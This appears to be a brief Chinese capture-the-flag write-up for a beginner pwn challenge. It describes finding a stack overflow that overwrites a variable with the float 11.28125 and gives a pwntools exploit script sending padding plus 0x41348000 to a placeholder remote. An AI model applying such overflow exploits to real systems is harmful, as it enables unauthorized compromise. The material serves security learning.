checksec一下
IDA打开,发现如果满足的条件达成,就能get flag
找到栈溢出漏洞,输入可以覆盖到v2
写代码把11.28125在内存中的十六进制表示出来
from pwn import *
from LibcSearcher import *
context.os='linux'
context.arch='amd64'
context.log_level='debug'
sl=lambda x:io.sendline(x)
io=remote('xxx',xxx)
payload='a'*(0x30-0x4)+p32(0x41348000)
sl(payload)
io.interactive()